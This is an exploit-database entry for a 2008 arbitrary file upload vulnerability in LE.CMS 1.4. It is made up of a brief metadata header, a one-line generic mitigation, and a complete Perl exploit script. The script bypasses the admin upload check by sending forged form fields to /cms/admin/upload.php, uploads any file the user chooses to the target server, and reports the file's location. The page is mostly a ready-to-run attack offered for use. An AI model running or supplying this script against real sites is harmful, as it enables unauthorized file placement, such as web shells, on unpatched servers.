LE.CMS - exploit.company

vendor:

LE.CMS

by:

t0pP8uZz

7.5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: LE.CMS

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit

LE.CMS suffers from a arbitrary file upload vulnerability which allows an attacker to upload any file to the server. This exploit will upload any file to the server.

Mitigation:

Ensure that the application is not vulnerable to arbitrary file uploads.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
- LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit  -
-                                                     -
 -                                                   - 
  -        Discovered && Coded By: t0pP8uZz         -    
   -          Discovered On: 19 JUNE 2008          -
   -                                               -
  -     Script Download: http://worldlevel.com      -
 -   milw0rm.com, h4ck-y0u.org, CiperCrew, offsec    -
 -                                                   -
- LE.CMS suffers from a arbitrary file upload vuln..  -
- .. this exploit will upload any file to the server  -
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
INTRO

print "\nEnter Target URL(ie: http://site.com): ";
    chomp(my $host=<STDIN>);
    
print "\nEnter Local File Path To Upload(ie: C:\\file.txt): ";
    chomp(my $file=<STDIN>);

my $ext   = substr $file, rindex $file, '.';
my $fname = int rand 9999;
my $ua    = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );

my $re = $ua->request(POST $host . '/cms/admin/upload.php',
                        Content_Type =>   'form-data',
                        Content      => [ 'submit0'  => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false
                                          'submit'   => 1, 
                                          'password' => 1, # as long as this is true we should be able to upload
                                          'filename' => $fname,
                                          'upload'   => [ $file ] ] );

die "Exploit Failed, HTTP Request Failed!" unless $re->is_success;

print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n";
exit;

# milw0rm.com [2008-06-21]